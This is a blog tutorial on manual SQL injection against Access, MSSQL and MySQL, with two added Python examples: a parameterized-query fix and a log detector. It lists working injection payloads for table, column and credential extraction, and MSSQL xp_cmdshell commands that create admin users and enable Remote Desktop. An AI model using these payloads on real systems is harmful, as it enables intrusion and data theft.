Basic workflow for manual injection on Access, MSSQL and MySQL

Category: 颓废's Blog

0x01 Access injection:

Identify the table name (admin):
    and (select count(*) from admin)>0
Identify the column names (username, password; here admin_user, admin_pwd):
    and (select count(admin_user) from admin)>0
Guess the length of the values (admin_user = 5, admin_pwd = 16), trying lengths one after another:
    and (select len(admin_user) from admin)=4
Guess the value itself, trying letters and digits one at a time inside the quotes:
    and (select left(admin_user,1) from admin)='a'
    and (select left(admin_user,2) from admin)='ad'
    and (select left(admin_user,3) from admin)='adm'

Offset injection

Guess the table name; if the table exists the page loads normally (columns are guessed the same way; here the result is that admin exists):
    and exists (select * from <table name to guess>)
Guess the column names of that table; check whether the column exists (here the result is that username and password exist):
    and exists (select <column name to guess> from <table name already found>)
Find the column count: raise n in order by n until the page stops returning normally; the number of columns is then n-1. Pick n by binary search.
    order by n
Find which positions are displayed on the page:
    union select 1,2,3,4,5,...,n-1 from admin
Use a displayed position to read the column contents:
    union select 1,2,username,4,5,...,n-1 from admin
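The probes above only work because the application pastes the parameter into the query text, so the injected subquery becomes part of the WHERE clause and the page's behaviour leaks its truth value. The following added example (not from the original post) reproduces that with Python's sqlite3 as a stand-in for Access, using substr() where Access has left(), and shows that the same inputs do nothing against a parameterized query. The users and admin tables, their rows and the probe strings are constructed for the demonstration.

```python
import sqlite3


def make_db():
    """Build a constructed in-memory database shaped like the post's target:
    a users table the page queries and an admin table the probes read."""
    con = sqlite3.connect(":memory:")
    con.execute("create table users (id integer primary key, username text, password text)")
    con.execute("create table admin (admin_user text, admin_pwd text)")
    con.execute("insert into users values (1, 'alice', 'not-a-real-hash')")
    con.execute("insert into admin values ('admin', 'not-a-real-hash')")
    con.commit()
    return con


def lookup_vulnerable(con, username):
    """The flawed pattern: the parameter is concatenated into the SQL text, so
    a quote in the input ends the literal and whatever follows is parsed as SQL."""
    sql = "select id from users where username='" + username + "'"
    return [row[0] for row in con.execute(sql)]


def lookup_safe(con, username):
    """The fix: the value travels as a bound parameter and is never parsed as
    SQL, so the probe is just an odd user name that matches no row."""
    sql = "select id from users where username=?"
    return [row[0] for row in con.execute(sql, (username,))]


# Constructed probe inputs in the post's style. Each closes the string literal,
# appends a boolean subquery and reopens a literal so the SQL stays valid.
# SQLite has substr() instead of Access's left(); the inference is the same.
PROBE_TRUE = "alice' and (select count(*) from admin)>0 and '1'='1"
PROBE_FALSE = "alice' and (select count(*) from admin)>5 and '1'='1"
PROBE_CHAR_A = "alice' and (select substr(admin_user,1,1) from admin)='a' and '1'='1"
PROBE_CHAR_B = "alice' and (select substr(admin_user,1,1) from admin)='b' and '1'='1"


def demo():
    """Run every probe through both lookups and return {label: (vulnerable, safe)}."""
    con = make_db()
    results = {}
    for label, probe in [("true", PROBE_TRUE), ("false", PROBE_FALSE),
                         ("char_a", PROBE_CHAR_A), ("char_b", PROBE_CHAR_B)]:
        # The vulnerable lookup returns alice's row exactly when the injected
        # condition is true: that difference is the oracle the post relies on.
        # The parameterized lookup returns nothing either way.
        results[label] = (lookup_vulnerable(con, probe), lookup_safe(con, probe))
    return results


if __name__ == "__main__":
    for label, (vuln, safe) in demo().items():
        print(f"{label:7s} vulnerable={vuln} parameterized={safe}")
```

The point of the comparison is that no input filtering is involved in the fix: the bound parameter is handed to the engine as data, so there is no string for a quote to terminate.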

0x02 MSSQL / SQL Server injection:

Confirm the injection point:
    and 1=1
    and 1=2
Get the version:
    and 1=@@version
Get the user name:
    and 1=user
Get the currently connected database (article):
    and 1=db_name()
Enumerate the other databases:
    and 1=(select name from master.dbo.sysdatabases where dbid=6)
Get the first table name ('admin'); sysobjects lists the current database, so sysobjects = article.sys.sysobjects:
    and (select top 1 name from sysobjects where xtype='u')>0
Get the other table names ('t_jiaozhu'):
    and (select top 1 name from sysobjects where xtype='u' and name not in('admin'))>0
Get the columns (username, password):
    and (Select Top 1 col_name(object_id('admin'),1) from sysobjects)>0
Get the values:
    and (select username from admin)>0
Then crack the password MD5 or replace the MD5 value.

Follow-up: SQL Server extended stored procedures

Create a system user:
    net user username pass /add
System privilege escalation:
    net localgroup administrators username /add
Enable 3389 (Remote Desktop):
    reg add "hklm/System/CurrentControlSet/Control/Terminal Server" /v fDenyTSConnections /t reg_dword /d "0" /f
Create a database login:
    ;exec master..sp_addlogin user,pass;--
Database privilege escalation:
    ;exec master..sp_addsrvrolemember aa,sysadmin;--
Using xp_cmdshell to create a system user:
    ;exec master..xp_cmdshell "net user bb bb /add"--
Blocking xp_cmdshell:
    ;exec master..sp_dropextendedproc 'xp_cmdshell'
Restoring xp_cmdshell:
    ;exec master..sp_addextendedproc 'xp_cmdshell','xplog70.dll'
Complete "overflow" protection: remove all default permissions on c:/windows/system32/cmd.exe and add only Administrator with full control.

0x03 MySQL injection:

Find the column count (%23 is the URL-encoded # that comments out the rest of the query):
    order by 3%23
    union select 1,2,3%23
Get the current database name (security):
    union select 1,(select database()),3%23
Get all database names (information_schema, challenges, mysql, performance_schema, security):
    union select 1,2,(select group_concat(schema_name) from information_schema.schemata)%23
Get the table names (emails, referers, uagents, users); 0x7365637572697479 is the hex encoding of "security":
    union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema = 0x7365637572697479)%23
Get the column names (id, username, password); 0x7573657273 is "users":
    union select 1,2,(select group_concat(column_name) from information_schema.columns where table_schema = 0x7365637572697479 and table_name=0x7573657273)%23
Get the data (0x7c is the "|" separator):
    union select 1,2,(select group_concat(id,0x7c,username,0x7c,password) from security.users)%23
Get the database version:
    union select 1,@@version,database()%23
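What a defender takes from the MSSQL and MySQL sections above is a set of request patterns to recognise in web server logs: boolean subqueries, order by and union select column probes, information_schema and sysobjects catalog reads, xp_cmdshell and sp_add* procedure calls, @@version, and the hex-encoded string literals MySQL accepts. The following added example (not from the original post) is a small Python detector run over constructed Combined Log Format lines. It URL-decodes each request target (so %23 becomes #), collapses inline-comment and whitespace evasions, applies one regex per probe family, and decodes hex literals so an analyst can see which schema or table was being read. The log lines, client addresses, paths and rule names are all constructed.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access-log lines (Combined Log Format); none are real traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /article.asp?id=7 HTTP/1.1" 200 5120
10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /article.asp?id=7%20and%20(select%20count(*)%20from%20admin)>0 HTTP/1.1" 200 5120
10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /article.asp?id=7%20and%20(select%20top%201%20name%20from%20sysobjects%20where%20xtype='u')>0 HTTP/1.1" 500 812
10.0.0.9 - - [01/Jan/2024:10:00:04 +0000] "GET /article.asp?id=7;exec%20master..xp_cmdshell%20%22whoami%22-- HTTP/1.1" 500 812
10.0.0.12 - - [01/Jan/2024:10:00:05 +0000] "GET /index.php?id=1%20union%20select%201,2,(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=0x7365637572697479)%23 HTTP/1.1" 200 3301
10.0.0.20 - - [01/Jan/2024:10:00:06 +0000] "GET /index.php?id=1%20order%20by%203%23 HTTP/1.1" 200 3301
10.0.0.21 - - [01/Jan/2024:10:00:07 +0000] "GET /search.php?q=union+station HTTP/1.1" 200 2210
"""

# client, timestamp, method, request target, status code
LOG_LINE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) \S+$')

# One rule per probe family from the post; names are constructed labels.
RULES = [
    ("boolean_subquery", re.compile(r"\b(?:and|or)\s*\(\s*select\b", re.I)),
    ("union_select", re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I)),
    ("order_by_probe", re.compile(r"\border\s+by\s+\d+", re.I)),
    ("mysql_schema_enum", re.compile(r"\binformation_schema\.(?:schemata|tables|columns)\b", re.I)),
    ("mssql_catalog_enum", re.compile(r"\b(?:sysobjects|sysdatabases)\b|\bcol_name\s*\(", re.I)),
    ("mssql_proc_abuse", re.compile(r"\b(?:xp_cmdshell|sp_addlogin|sp_addsrvrolemember|sp_addextendedproc)\b", re.I)),
    ("version_fingerprint", re.compile(r"@@version\b|\bversion\s*\(\s*\)", re.I)),
    ("hex_string_literal", re.compile(r"\b0x(?:[0-9a-f]{2}){3,}\b", re.I)),
]


def normalize(target):
    """URL-decode the request target and collapse the comment/whitespace
    tricks that are commonly used to split keywords apart."""
    decoded = unquote_plus(target)
    decoded = re.sub(r"/\*.*?\*/", " ", decoded)  # /**/ used as whitespace
    return re.sub(r"\s+", " ", decoded)


def decode_hex_literals(text):
    """Turn MySQL 0x... literals back into text when they decode to printable ASCII."""
    out = []
    for m in re.finditer(r"0x((?:[0-9a-fA-F]{2})+)", text):
        raw = bytes.fromhex(m.group(1))
        if all(32 <= b < 127 for b in raw):
            out.append(raw.decode("ascii"))
    return out


def analyze_log(text):
    """Return one finding per request that matches at least one rule."""
    findings = []
    for line in text.splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue  # malformed line: skip rather than guess
        ip, _ts, _method, target, status = m.groups()
        decoded = normalize(target)
        hits = [name for name, rx in RULES if rx.search(decoded)]
        if hits:
            findings.append({
                "ip": ip,
                "status": int(status),
                "target": decoded,
                "rules": hits,
                "hex_literals": decode_hex_literals(decoded),
            })
    return findings


def suspicious_ips(findings):
    """Count flagged requests per client; the post's probes arrive as long
    runs from one client, so the count is the useful triage signal."""
    counts = {}
    for f in findings:
        counts[f["ip"]] = counts.get(f["ip"], 0) + 1
    return counts


if __name__ == "__main__":
    hits = analyze_log(SAMPLE_LOG)
    for f in hits:
        print(f"{f['ip']:10s} {f['status']} {f['rules']} {f['hex_literals']} {f['target']}")
    print(suspicious_ips(hits))
```

The search "union+station" request is included to show that the rules key on SQL structure (union followed by select, a subquery opened by and/or) rather than on single words; decoding before matching matters because every probe on the page arrives URL-encoded.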

Author: zerokeeper
